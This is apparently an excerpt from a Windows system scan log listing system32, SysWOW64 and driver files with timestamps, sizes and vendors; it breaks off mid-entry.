C:\Windows\system32\tssrvlic.dll 2015-09-19 16:12 - 2010-11-20 15:27 - 00012288 _____ (Microsoft Corporation) C:\Windows\system32\TsUsbRedirectionGroupPolicyExtension.dll 2015-09-19 16:12 - 2010-11-20 15:26 - 12260864 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll 2015-09-19 16:12 - 2010-11-20 15:26 - 04120064 _____ (Microsoft Corporation) C:\Windows\system32\mf.dll 2015-09-19 16:12 - 2010-11-20 15:26 - 03205120 _____ (Microsoft Corporation) C:\Windows\system32\mmcndmgr.dll 2015-09-19 16:12 - 2010-11-20 15:26 - 02565632 _____ (Microsoft Corporation) C:\Windows\system32\esent.dll 2015-09-19 16:12 - 2010-11-20 15:26 - 02444288 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll 2015-09-19 16:12 - 2010-11-20 15:26 - 01866240 _____ (Microsoft Corporation) C:\Windows\system32\ExplorerFrame.dll 2015-09-19 16:12 - 2010-11-20 15:26 - 01838080 _____ (Microsoft Corporation) C:\Windows\system32\d3d10warp.dll 2015-09-19 16:12 - 2010-11-20 15:26 - 01544192 _____ (Microsoft Corporation) C:\Windows\system32\DWrite.dll 2015-09-19 16:12 - 2010-11-20 15:26 - 01340416 _____ (Microsoft Corporation) C:\Windows\system32\diagperf.dll 2015-09-19 16:12 - 2010-11-20 15:26 - 00919040 _____ (Microsoft Corporation) C:\Windows\system32\jscript.dll 2015-09-19 16:12 - 2010-11-20 15:26 - 00828416 _____ (Microsoft Corporation) C:\Windows\system32\MPSSVC.dll 2015-09-19 16:12 - 2010-11-20 15:25 - 03957760 _____ (Microsoft Corporation) C:\Windows\system32\WinSAT.exe 2015-09-19 16:12 - 2010-11-20 15:25 - 01975296 _____ (Microsoft Corporation) C:\Windows\system32\CertEnroll.dll 2015-09-19 16:12 - 2010-11-20 15:25 - 00902144 _____ (Microsoft Corporation) C:\Windows\system32\d2d1.dll 2015-09-19 16:12 - 2010-11-20 15:25 - 00598016 _____ (Microsoft Corporation) C:\Windows\system32\spinstall.exe 2015-09-19 16:12 - 2010-11-20 15:25 - 00362496 _____ (Microsoft Corporation) C:\Windows\system32\RMActivate_isv.exe 2015-09-19 16:12 - 2010-11-20 15:25 - 00359424 _____ (Microsoft Corporation) C:\Windows\system32\RMActivate.exe 2015-09-19 16:12 - 2010-11-20 15:25 - 00301568 _____ (Microsoft Corporation) C:\Windows\system32\spreview.exe 2015-09-19 16:12 - 2010-11-20 15:25 - 00095744 _____ C:\Windows\system32\RDVGHelper.exe 2015-09-19 16:12 - 2010-11-20 15:24 - 02872320 _____ (Microsoft Corporation) C:\Windows\explorer.exe 2015-09-19 16:12 - 2010-11-20 14:21 - 12872192 _____ (Microsoft Corporation) C:\Windows\SysWOW64\shell32.dll 2015-09-19 16:12 - 2010-11-20 14:21 - 11410432 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wmp.dll 2015-09-19 16:12 - 2010-11-20 14:21 - 01548288 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tquery.dll 2015-09-19 16:12 - 2010-11-20 14:21 - 00870912 _____ (Microsoft Corporation) C:\Windows\SysWOW64\XpsPrint.dll 2015-09-19 16:12 - 2010-11-20 14:21 - 00423936 _____ (Microsoft Corporation) C:\Windows\SysWOW64\secproc_isv.dll 2015-09-19 16:12 - 2010-11-20 14:20 - 00428032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\secproc.dll 2015-09-19 16:12 - 2010-11-20 14:19 - 10990080 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieframe.dll 2015-09-19 16:12 - 2010-11-20 14:19 - 05977600 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.dll 2015-09-19 16:12 - 2010-11-20 14:19 - 03215872 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mstscax.dll 2015-09-19 16:12 - 2010-11-20 14:19 - 03207680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mf.dll 2015-09-19 16:12 - 2010-11-20 14:19 - 02064384 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iertutil.dll 2015-09-19 16:12 - 2010-11-20 14:19 - 01698816 _____ (Microsoft Corporation) C:\Windows\SysWOW64\esent.dll 2015-09-19 16:12 - 2010-11-20 14:19 - 01401344 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mssrch.dll 2015-09-19 16:12 - 2010-11-20 14:19 - 00954752 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfc40.dll 2015-09-19 16:12 - 2010-11-20 14:19 - 00954288 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfc40u.dll 2015-09-19 16:12 - 2010-11-20 14:18 - 01334272 _____ (Microsoft Corporation) C:\Windows\SysWOW64\CertEnroll.dll 2015-09-19 16:12 - 2010-11-20 14:18 - 01171456 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3d10warp.dll 2015-09-19 16:12 - 2010-11-20 14:18 - 00739840 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d2d1.dll 2015-09-19 16:12 - 2010-11-20 14:17 - 00327168 _____ (Microsoft Corporation) C:\Windows\SysWOW64\RMActivate_isv.exe 2015-09-19 16:12 - 2010-11-20 14:17 - 00322048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\RMActivate.exe 2015-09-19 16:12 - 2010-11-20 14:17 - 00051200 _____ (Microsoft Corporation) C:\Windows\SysWOW64\PushPrinterConnections.exe 2015-09-19 16:12 - 2010-11-20 13:07 - 00162816 _____ (Microsoft Corporation) C:\Windows\system32\rdpudd.dll 2015-09-19 16:12 - 2010-11-20 13:07 - 00059392 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\TsUsbFlt.sys 2015-09-19 16:12 - 2010-11-20 13:05 - 00274944 _____ (Microsoft Corporation) C:\Windows\system32\rdpdd.dll 2015-09-19 16:12 - 2010-11-20 11:53 - 03126272 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys 2015-09-19 16:12 - 2010-11-05 04:20 - 00347904 _____ C:\Windows\system32\systemsf.ebd 2015-09-19 16:12 - 2010-11-05 03:58 - 01130824 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dfshim.dll 2015-09-19 16:12 - 2010-11-05 03:58 - 00297808 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mscoree.dll 2015-09-19 16:12 - 2010-11-05 03:57 - 00444752 _____ (Microsoft Corporation) C:\Windows\system32\mscoree.dll 2015-09-19 16:12 - 2010-11-05 03:53 - 00320352 _____ (Microsoft Corporation) C:\Windows\system32\PresentationHost.exe 2015-09-19 16:12 - 2010-11-05 03:53 - 00295264 _____ (Microsoft Corporation) C:\Windows\SysWOW64\PresentationHost.exe 2015-09-19 16:12 - 2010-11-05 03:53 - 00109928 _____ (Microsoft Corporation) C:\Windows\system32\PresentationHostProxy.dll 2015-09-19 16:12 - 2010-11-05 03:53 - 00099176 _____ (Microsoft Corporation) C:\Windows\SysWOW64\PresentationHostProxy.dll 2015-09-19 16:12 - 2009-07-14 03:16 - 00629760 _____ (Microsoft Corporation) C:\Windows\SysWOW64\pmcsnap.dll 2015-09-19 16:12 - 2009-07-14 03:16 - 00238080 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ppcsnap.dll 2015-09-19 16:11 - 2010-11-20 15:39 - 05066752 _____ (Microsoft Corporation) C:\Windows\system32\AuthFWSnapin.dll 2015-09-19 16:11 - 2010-11-20 15:34 - 00295808 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\volsnap.sys 2015-09-19 16:11 - 2010-11-20 15:34 - 00215936 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\vhdmp.sys 2015-09-19 16:11 - 2010-11-20 15:34 - 00199552 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\vmbus.sys 2015-09-19 16:11 - 2010-11-20 15:33 - 00982912 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\dxgkrnl.sys 2015-09-19 16:11 - 2010-11-20 15:33 - 00951680 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ndis.sys 2015-09-19 16:11 - 2010-11-20 15:33 - 00642944 _____ (Microsoft Corporation) C:\Windows\system32\winload.efi 2015-09-19 16:11 - 2010-11-20 15:33 - 00376192 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\netio.sys 2015-09-19 16:11 - 2010-11-20 15:33 - 00366976 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\msrpc.sys 2015-09-19 16:11 - 2010-11-20 15:33 - 00289664 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\fltMgr.sys 2015-09-19 16:11 - 2010-11-20 15:33 - 00189824 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\storport.sys 2015-09-19 16:11 - 2010-11-20 15:33 - 00184704 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\pci.sys 2015-09-19 16:11 - 2010-11-20 15:33 - 00166272 _____ (NVIDIA Corporation) C:\Windows\system32\Drivers\nvstor.sys 2015-09-19 16:11 - 2010-11-20 15:33 - 00148352 _____ (NVIDIA Corporation) C:\Windows\system32\Drivers\nvraid.sys 2015-09-19 16:11 - 2010-11-20 15:32 - 00107904 _____ (Advanced Micro Devices) C:\Windows\system32\Drivers\amdsata.sys 2015-09-19 16:11 - 2010-11-20 15:29 - 00345600 _____ (Microsoft Corporation) C:\Windows\system32\fveapi.dll 2015-09-19 16:11 - 2010-11-20 15:28 - 00605552 _____ (Microsoft Corporation) C:\Windows\system32\winload.exe 2015-09-19 16:11 - 2010-11-20 15:28 - 00566208 _____ (Microsoft Corporation) C:\Windows\system32\winresume.efi 2015-09-19 16:11 - 2010-11-20 15:28 - 00518672 _____ (Microsoft Corporation) C:\Windows\system32\winresume.exe 2015-09-19 16:11 - 2010-11-20 15:28 - 00459248 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\cng.sys 2015-09-19 16:11 - 2010-11-20 15:28 - 00298104 _____ (Microsoft Corporation) C:\Windows\system32\bcryptprimitives.dll 2015-09-19 16:11 - 2010-11-20 15:27 - 03211776 _____ (Microsoft Corporation) C:\Windows\system32\msi.dll 2015-09-19 16:11 - 2010-11-20 15:27 - 02652160 _____ (Microsoft Corporation) C:\Windows\system32\netshell.dll 2015-09-19 16:11 - 2010-11-20 15:27 - 02543616 _____ (Microsoft Corporation) C:\Windows\system32\wpdshext.dll 2015-09-19 16:11 - 2010-11-20 15:27 - 02262528 _____ (Microsoft Corporation) C:\Windows\system32\SyncCenter.dll 2015-09-19 16:11 - 2010-11-20 15:27 - 02072576 _____ (Microsoft Corporation) C:\Windows\system32\WMPEncEn.dll 2015-09-19 16:11 - 2010-11-20 15:27 - 02055680 _____ (Microsoft Corporation) C:\Windows\system32\Query.dll 2015-09-19 16:11 - 2010-11-20 15:27 - 02004480 _____ (Microsoft Corporation) C:\Windows\system32\msxml6.dll 2015-09-19 16:11 - 2010-11-20 15:27 - 01900544 _____ (Microsoft Corporation) C:\Windows\system32\setupapi.dll 2015-09-19 16:11 - 2010-11-20 15:27 - 01808384 _____ (Microsoft Corporation) C:\Windows\system32\pnidui.dll 2015-09-19 16:11 - 2010-11-20 15:27 - 01572352 _____ (Microsoft Corporation) C:\Windows\system32\quartz.dll 2015-09-19 16:11 - 2010-11-20 15:27 - 01509888 _____ (Microsoft Corporation) C:\Windows\system32\msdtctm.dll 2015-09-19 16:11 - 2010-11-20 15:27 - 01441280 _____ (Microsoft Corporation) C:\Windows\system32\wlanpref.dll 2015-09-19 16:11 - 2010-11-20 15:27 - 01389056 _____ (Microsoft Corporation) C:\Windows\system32\pla.dll 2015-09-19 16:11 - 2010-11-20 15:27 - 01281024 _____ (Microsoft Corporation) C:\Windows\system32\werconcpl.dll 2015-09-19 16:11 - 2010-11-20 15:27 - 01243136 _____ (Microsoft Corporation) C:\Windows\system32\WMNetMgr.dll 2015-09-19 16:11 - 2010-11-20 15:27 - 01212416 _____ (Microsoft Corporation) C:\Windows\system32\propsys.dll 2015-09-19 16:11 - 2010-11-20 15:27 - 01190400 _____ (Microsoft Corporation) C:\Windows\system32\WindowsCodecs.dll 2015-09-19 16:11 - 2010-11-20 15:27 - 01158656 _____ (Microsoft Corporation) C:\Windows\system32\webservices.dll 2015-09-19 16:11 - 2010-11-20 15:27 - 01118208 _____ (Microsoft Corporation) C:\Windows\system32\sbe.dll 2015-09-19 16:11 - 2010-11-20 15:27 - 01098240 _____ (Microsoft Corporation) C:\Windows\system32\Vault.dll 2015-09-19 16:11 - 2010-11-20 15:27 - 01082880 _____ (Microsoft Corporation) C:\Windows\system32\sppobjs.dll 2015-09-19 16:11 - 2010-11-20 15:27 - 01050624 _____ (Microsoft Corporation) C:\Windows\system32\printui.dll 2015-09-19 16:11 - 2010-11-20 15:27 - 01026560 _____ (Microsoft Corporation) C:\Windows\system32\mstime.dll 2015-09-19 16:11 - 2010-11-20 15:27 - 01024512 _____ (Microsoft Corporation) C:\Windows\system32\wmpmde.dll 2015-09-19 16:11 - 2010-11-20 15:27 - 01008128 _____ (Microsoft Corporation) C:\Windows\system32\user32.dll 2015-09-19 16:11 - 2010-11-20 15:27 - 00933888 _____ (Microsoft Corporation) C:\Windows\system32\sqlsrv32.dll 2015-09-19 16:11 - 2010-11-20 15:27 - 00867840 _____ (Microsoft Corporation) C:\Windows\system32\SearchFolder.dll 2015-09-19 16:11 - 2010-11-20 15:27 - 00861696 _____ (Microsoft Corporation) C:\Windows\system32\oleaut32.dll 2015-09-19 16:11 - 2010-11-20 15:27 - 00849920 _____ (Microsoft Corporation) C:\Windows\system32\qmgr.dll 2015-09-19 16:11 - 2010-11-20 15:27 - 00800256 _____ (Microsoft Corporation) C:\Windows\system32\usp10.dll 2015-09-19 16:11 - 2010-11-20 15:27 - 00778752 _____ (Microsoft Corporation) C:\Windows\system32\mssvp.dll 2015-09-19 16:11 - 2010-11-20 15:27 - 00758784 _____ (Microsoft Corporation) C:\Windows\system32\samsrv.dll 2015-09-19 16:11 - 2010-11-20 15:27 - 00758272 _____ (Microsoft Corporation) C:\Windows\system32\PortableDeviceApi.dll 2015-09-19 16:11 - 2010-11-20 15:27 - 00751104 _____ (Microsoft Corporation) C:\Windows\system32\win32spl.dll 2015-09-19 16:11 - 2010-11-20 15:27 - 00750080 _____ (Microsoft Corporation) C:\Windows\system32\TSWorkspace.dll 2015-09-19 16:11 - 2010-11-20 15:27 - 00722944 _____ (Microsoft Corporation) C:\Windows\system32\EncDec.dll 2015-09-19 16:11 - 2010-11-20 15:27 - 00720896 _____ (Microsoft Corporation) C:\Windows\system32\odbc32.dll 2015-09-19 16:11 - 2010-11-20 15:27 - 00702464 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll 2015-09-19 16:11 - 2010-11-20 15:27 - 00695808 _____ (Microsoft Corporation) C:\Windows\system32\netlogon.dll 2015-09-19 16:11 - 2010-11-20 15:27 - 00680960 _____ (Microsoft Corporation) C:\Windows\system32\termsrv.dll 2015-09-19 16:11 - 2010-11-20 15:27 - 00625664 _____ (Microsoft Corporation) C:\Windows\system32\mscms.dll 2015-09-19 16:11 - 2010-11-20 15:27 - 00612864 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll 2015-09-19 16:11 - 2010-11-20 15:27 - 00605696 _____ (Microsoft Corporation) C:\Windows\system32\wmpeffects.dll 2015-09-19 16:11 - 2010-11-20 15:27 - 00582656 _____ (Microsoft Corporation) C:\Windows\system32\sxs.dll 2015-09-19 16:11 - 2010-11-20 15:27 - 00580096 _____ (Microsoft Corporation) C:\Windows\system32\wiaservc.dll 2015-09-19 16:11 - 2010-11-20 15:27 - 00577536 _____ (Microsoft Corporation) C:\Windows\system32\WSDApi.dll 2015-09-19 16:11 - 2010-11-20 15:27 - 00571904 _____ (Microsoft Corporation) C:\Windows\system32\mspbda.dll 2015-09-19 16:11 - 2010-11-20 15:27 - 00552960 _____ (Microsoft Corporation) C:\Windows\system32\msdri.dll 2015-09-19 16:11 - 2010-11-20 15:27 - 00524288 _____ (Microsoft Corporation) C:\Windows\system32\wmicmiplugin.dll 2015-09-19 16:11 - 2010-11-20 15:27 - 00519680 _____ (Microsoft Corporation) C:\Windows\system32\netcfgx.dll 2015-09-19 16:11 - 2010-11-20 15:27 - 00512000 _____ (Microsoft Corporation) C:\Windows\system32\rpcss.dll 2015-09-19 16:11 - 2010-11-20 15:27 - 00501248 _____ (Microsoft Corporation) C:\Windows\system32\WinSATAPI.dll 2015-09-19 16:11 - 2010-11-20 15:27 - 00481280 _____ (Microsoft Corporation) C:\Windows\system32\wmpps.dll 2015-09-19 16:11 - 2010-11-20 15:27 - 00476160 _____ (Microsoft Corporation) C:\Windows\system32\QAGENTRT.DLL 2015-09-19 16:11 - 2010-11-20 15:27 - 00473600 _____ (Microsoft Corporation) C:\Windows\system32\taskcomp.dll 2015-09-19 16:11 - 2010-11-20 15:27 - 00470016 _____ (Microsoft Corporation) C:\Windows\system32\XpsGdiConverter.dll 2015-09-19 16:11 - 2010-11-20 15:27 - 00457216 _____ (Microsoft Corporation) C:\Windows\system32\msdrm.dll 2015-09-19 16:11 - 2010-11-20 15:27 - 00448512 _____ (Microsoft Corporation) C:\Windows\system32\shlwapi.dll 2015-09-19 16:11 - 2010-11-20 15:27 - 00444416 _____ (Microsoft Corporation) C:\Windows\system32\winhttp.dll 2015-09-19 16:11 - 2010-11-20 15:27 - 00409600 _____ (Microsoft Corporation) C:\Windows\system32\photowiz.dll 2015-09-19 16:11 - 2010-11-20 15:27 - 00404480 _____ (Microsoft Corporation) C:\Windows\system32\umpnpmgr.dll 2015-09-19 16:11 - 2010-11-20 15:27 - 00395776 _____ (Microsoft Corporation) C:\Windows\system32\webio.dll 2015-09-19 16:11 - 2010-11-20 15:27 - 00370688 _____ (Microsoft Corporation) C:\Windows\system32\shsvcs.dll 2015-09-19 16:11 - 2010-11-20 15:27 - 00340992 _____ (Microsoft Corporation) C:\Windows\system32\schannel.dll 2015-09-19 16:11 - 2010-11-20 15:27 - 00326144 _____ (Microsoft Corporation) C:\Windows\system32\mswsock.dll 2015-09-19 16:11 - 2010-11-20 15:27 - 00324096 _____ (Microsoft Corporation) C:\Windows\system32\netdiagfx.dll 2015-09-19 16:11 - 2010-11-20 15:27 - 00312832 _____ (Microsoft Corporation) C:\Windows\system32\Wldap32.dll 2015-09-19 16:11 - 2010-11-20 15:27 - 00312320 _____ (Microsoft Corporation) C:\Windows\system32\msv1_0.dll 2015-09-19 16:11 - 2010-11-20 15:27 - 00303616 _____ (Microsoft Corporation) C:\Windows\system32\scansetting.dll 2015-09-19 16:11 - 2010-11-20 15:27 - 00303616 _____ (Microsoft Corporation) C:\Windows\system32\nlasvc.dll 2015-09-19 16:11 - 2010-11-20 15:27 - 00299520 _____ (Microsoft Corporation) C:\Windows\system32\tsmf.dll 2015-09-19 16:11 - 2010-11-20 15:27 - 00297984 _____ (Microsoft Corporation) C:\Windows\system32\ws2_32.dll 2015-09-19 16:11 - 2010-11-20 15:27 - 00266240 _____ (Microsoft Corporation) C:\Windows\system32\QAGENT.DLL 2015-09-19 16:11 - 2010-11-20 15:27 - 00263168 _____ (Microsoft Corporation) C:\Windows\system32\vpnike.dll 2015-09-19 16:11 - 2010-11-20 15:27 - 00258560 _____ (Microsoft Corporation) C:\Windows\system32\WebClnt.dll 2015-09-19 16:11 - 2010-11-20 15:27 - 00257024 _____ (Microsoft Corporation) C:\Windows\system32\stobject.dll 2015-09-19 16:11 - 2010-11-20 15:27 - 00253440 _____ (Microsoft Corporation) C:\Windows\system32\tcpipcfg.dll 2015-09-19 16:11 - 2010-11-20 15:27 - 00244736 _____ (Microsoft Corporation) C:\Windows\system32\sqmapi.dll 2015-09-19 16:11 - 2010-11-20 15:27 - 00244224 _____ (Microsoft Corporation) C:\Windows\system32\spp.dll 2015-09-19 16:11 - 2010-11-20 15:27 - 00236032 _____ (Microsoft Corporation) C:\Windows\system32\srvsvc.dll 2015-09-19 16:11 - 2010-11-20 15:27 - 00235008 _____ (Microsoft Corporation) C:\Windows\system32\winsta.dll 2015-09-19 16:11 - 2010-11-20 15:27 - 00229888 _____ (Microsoft Corporation) C:\Windows\system32\XpsRasterService.dll 2015-09-19 16:11 - 2010-11-20 15:27 - 00223232 _____ (Microsoft Corporation) C:\Windows\system32\QSHVHOST.DLL 2015-09-19 16:11 - 2010-11-20 15:27 - 00220672 _____ (Microsoft Corporation) C:\Windows\system32\wintrust.dll 2015-09-19 16:11 - 2010-11-20 15:27 - 00214528 _____ (Microsoft Corporation) C:\Windows\system32\umrdp.dll 2015-09-19 16:11 - 2010-11-20 15:27 - 00210944 _____ (Microsoft Corporation) C:\Windows\system32\ncsi.dll 2015-09-19 16:11 - 2010-11-20 15:27 - 00209920 _____ (Microsoft Corporation) C:\Windows\system32\profsvc.dll 2015-09-19 16:11 - 2010-11-20 15:27 - 00200192 _____ (Microsoft Corporation) C:\Windows\system32\tscfgwmi.dll 2015-09-19 16:11 - 2010-11-20 15:27 - 00187904 _____ (Microsoft Corporation) C:\Windows\system32\rpchttp.dll 2015-09-19 16:11 - 2010-11-20 15:27 - 00183808 _____ (Microsoft Corporation) C:\Windows\system32\prncache.dll 2015-09-19 16:11 - 2010-11-20 15:27 - 00169984 _____ (Microsoft Corporation) C:\Windows\system32\tspubwmi.dll 2015-09-19 16:11 - 2010-11-20 15:27 - 00167424 _____ (Microsoft Corporation) C:\Windows\system32\rdpendp.dll 2015-09-19 16:11 - 2010-11-20 15:27 - 00165376 _____ (Microsoft Corporation) C:\Windows\system32\netid.dll 2015-09-19 16:11 - 2010-11-20 15:27 - 00146944 _____ (Microsoft Corporation) C:\Windows\system32\scavengeui.dll 2015-09-19 16:11 - 2010-11-20 15:27 - 00121856 _____ (Microsoft Corporation) C:\Windows\system32\SessEnv.dll 2015-09-19 16:11 - 2010-11-20 15:27 - 00109056 _____ (Microsoft Corporation) C:\Windows\system32\userenv.dll 2015-09-19 16:11 - 2010-11-20 15:26 - 03391488 _____ (Microsoft Corporation) C:\Windows\system32\dbgeng.dll 2015-09-19 16:11 - 2010-11-20 15:26 - 02746880 _____ (Microsoft Corporation) C:\Windows\system32\gameux.dll 2015-09-19 16:11 - 2010-11-20 15:26 - 02067456 _____ (Microsoft Corporation) C:\Windows\system32\d3d9.dll 2015-09-19 16:11 - 2010-11-20 15:26 - 01632256 _____ (Microsoft Corporation) C:\Windows\system32\dwmcore.dll 2015-09-19 16:11 - 2010-11-20 15:26 - 01447936 _____ (Microsoft Corporation) C:\Windows\system32\lsasrv.dll 2015-09-19 16:11 - 2010-11-20 15:26 - 01244160 _____ (Microsoft Corporation) C:\Windows\system32\imapi2fs.dll 2015-09-19 16:11 - 2010-11-20 15:26 - 01161216 _____ (Microsoft Corporation) C:\Windows\system32\kernel32.dll 2015-09-19 16:11 - 2010-11-20 15:26 - 01137664 _____ (Microsoft Corporation) C:\Windows\system32\FntCache.dll 2015-09-19 16:11 - 2010-11-20 15:26 - 01009152 _____ (Microsoft Corporation) C:\Windows\system32\mcmde.dll 2015-09-19 16:11 - 2010-11-20 15:26 - 00976896 _____ (Microsoft Corporation) C:\Windows\system32\inetcomm.dll 2015-09-19 16:11 - 2010-11-20 15:26 - 00955904 _____ (Microsoft Corporation) C:\Windows\system32\localspl.dll 2015-09-19 16:11 - 2010-11-20 15:26 - 00934912 _____ (Microsoft Corporation) C:\Windows\system32\FirewallControlPanel.dll 2015-09-19 16:11 - 2010-11-20 15:26 - 00853504 _____ (Microsoft Corporation) C:\Windows\system32\IKEEXT.DLL 2015-09-19 16:11 - 2010-11-20 15:26 - 00787968 _____ (Microsoft Corporation) C:\Windows\system32\d3d11.dll 2015-09-19 16:11 - 2010-11-20 15:26 - 00784896 _____ (Microsoft Corporation) C:\Windows\system32\gpprefcl.dll 2015-09-19 16:11 - 2010-11-20 15:26 - 00777728 _____ (Microsoft Corporation) C:\Windows\system32\gpsvc.dll 2015-09-19 16:11 - 2010-11-20 15:26 - 00715264 _____ (Microsoft Corporation) C:\Windows\system32\kerberos.dll 2015-09-19 16:11 - 2010-11-20 15:26 - 00658944 _____ (Microsoft Corporation) C:\Windows\system32\dxgi.dll 2015-09-19 16:11 - 2010-11-20 15:26 - 00630272 _____ (Microsoft Corporation) C:\Windows\system32\evr.dll 2015-09-19 16:11 - 2010-11-20 15:26 - 00584192 _____ (Microsoft Corporation) C:\Windows\system32\ipsmsnap.dll 2015-09-19 16:11 - 2010-11-20 15:26 - 00569344 _____ (Microsoft Corporation) C:\Windows\system32\iphlpsvc.dll 2015-09-19 16:11 - 2010-11-20 15:26 - 00551936 _____ (Microsoft Corporation) C:\Windows\system32\localsec.dll 2015-09-19 16:11 - 2010-11-20 15:26 - 00503296 _____ (Microsoft Corporation) C:\Windows\system32\imapi2.dll 2015-09-19 16:11 - 2010-11-20 15:26 - 00501248 _____ (Microsoft Corporation) C:\Windows\system32\IPSECSVC.DLL 2015-09-19 16:11 - 2010-11-20 15:26 - 00422912 _____ (Microsoft Corporation) C:\Windows\system32\drvstore.dll 2015-09-19 16:11 - 2010-11-20 15:26 - 00419840 _____ (Microsoft Corporation) C:\Windows\system32\KernelBase.dll 2015-09-19 16:11 - 2010-11-20 15:26 - 00403968 _____ (Microsoft Corporation) C:\Windows\system32\gdi32.dll 2015-09-19 16:11 - 2010-11-20 15:26 - 00381440 _____ (Microsoft Corporation) C:\Windows\system32\mfds.dll 2015-09-19 16:11 - 2010-11-20 15:26 - 00357888 _____ (Microsoft Corporation) C:\Windows\system32\dnsapi.dll 2015-09-19 16:11 - 2010-11-20 15:26 - 00321024 _____ (Microsoft Corporation) C:\Windows\system32\d3d10_1core.dll 2015-09-19 16:11 - 2010-11-20 15:26 - 00317952 _____ (Microsoft Corporation) C:\Windows\system32\dhcpcore.dll 2015-09-19 16:11 - 2010-11-20 15:26 - 00295936 _____ (Microsoft Corporation) C:\Windows\system32\framedynos.dll 2015-09-19 16:11 - 2010-11-20 15:26 - 00281600 _____ (Microsoft) C:\Windows\system32\DShowRdpFilter.dll 2015-09-19 16:11 - 2010-11-20 15:26 - 00279040 _____ (Microsoft Corporation) C:\Windows\system32\framedyn.dll 2015-09-19 16:11 - 2010-11-20 15:26 - 00257024 _____ (Microsoft Corporation) C:\Windows\system32\mfreadwrite.dll 2015-09-19 16:11 - 2010-11-20 15:26 - 00252928 _____ (Microsoft Corporation) C:\Windows\system32\iepeers.dll 2015-09-19 16:11 - 2010-11-20 15:26 - 00235008 _____ (Microsoft Corporation) C:\Windows\system32\hgprint.dll 2015-09-19 16:11 - 2010-11-20 15:26 - 00183296 _____ (Microsoft Corporation) C:\Windows\system32\dnsrslvr.dll 2015-09-19 16:11 - 2010-11-20 15:26 - 00171520 _____ (Microsoft Corporation) C:\Windows\system32\fde.dll 2015-09-19 16:11 - 2010-11-20 15:26 - 00166912 _____ (Microsoft Corporation) C:\Windows\system32\inetpp.dll 2015-09-19 16:11 - 2010-11-20 15:26 - 00145920 _____ (Microsoft Corporation) C:\Windows\system32\IPHLPAPI.DLL 2015-09-19 16:11 - 2010-11-20 15:26 - 00100864 _____ (Microsoft Corporation) C:\Windows\system32\davclnt.dll 2015-09-19 16:11 - 2010-11-20 15:26 - 00084992 _____ (Microsoft Corporation) C:\Windows\system32\dot3api.dll 2015-09-19 16:11 - 2010-11-20 15:26 - 00053248 _____ (Microsoft Corporation) C:\Windows\system32\LSCSHostPolicy.dll 2015-09-19 16:11 - 2010-11-20 15:25 - 01927680 _____ (Microsoft Corporation) C:\Windows\system32\authui.dll 2015-09-19 16:11 - 2010-11-20 15:25 - 01796096 _____ (Microsoft Corporation) C:\Windows\system32\certmgr.dll 2015-09-19 16:11 - 2010-11-20 15:25 - 01600512 _____ (Microsoft Corporation) C:\Windows\system32\VSSVC.exe 2015-09-19 16:11 - 2010-11-20 15:25 - 01504256 _____ (Microsoft Corporation) C:\Windows\system32\wbengine.exe 2015-09-19 16:11 - 2010-11-20 15:25 - 01456128 _____ (Microsoft Corporation) C:\Windows\system32\crypt32.dll 2015-09-19 16:11 - 2010-11-20 15:25 - 01116672 _____ (Microsoft Corporation) C:\Windows\system32\mstsc.exe 2015-09-19 16:11 - 2010-11-20 15:25 - 00958464 _____ (Microsoft Corporation) C:\Windows\system32\actxprxy.dll 2015-09-19 16:11 - 2010-11-20 15:25 - 00897536 _____ (Microsoft Corporation) C:\Windows\system32\azroles.dll 2015-09-19 16:11 - 2010-11-20 15:25 - 00705024 _____ (Microsoft Corporation) C:\Windows\system32\BFE.DLL 2015-09-19 16:11 - 2010-11-20 15:25 - 00692224 _____ (Microsoft Corporation) C:\Windows\system32\cscsvc.dll 2015-09-19 16:11 - 2010-11-20 15:25 - 00679424 _____ (Microsoft Corporation) C:\Windows\system32\audiosrv.dll 2015-09-19 16:11 - 2010-11-20 15:25 - 00594432 _____ (Microsoft Corporation) C:\Windows\system32\comdlg32.dll 2015-09-19 16:11 - 2010-11-20 15:25 - 00577024 _____ (Microsoft Corporation) C:\Windows\system32\AdmTmpl.dll 2015-09-19 16:11 - 2010-11-20 15:25 - 00559104 _____ (Microsoft Corporation) C:\Windows\system32\spoolsv.exe 2015-09-19 16:11 - 2010-11-20 15:25 - 00533504 _____ (Microsoft Corporation) C:\Windows\system32\vds.exe 2015-09-19 16:11 - 2010-11-20 15:25 - 00504320 _____ (Microsoft Corporation) C:\Windows\system32\biocpl.dll 2015-09-19 16:11 - 2010-11-20 15:25 - 00498688 _____ (Microsoft Corporation) C:\Windows\system32\cscui.dll 2015-09-19 16:11 - 2010-11-20 15:25 - 00479232 _____ (Microsoft Corporation) C:\Windows\system32\appmgr.dll 2015-09-19 16:11 - 2010-11-20 15:25 - 00464384 _____ (Microsoft Corporation) C:\Windows\system32\taskeng.exe 2015-09-19 16:11 - 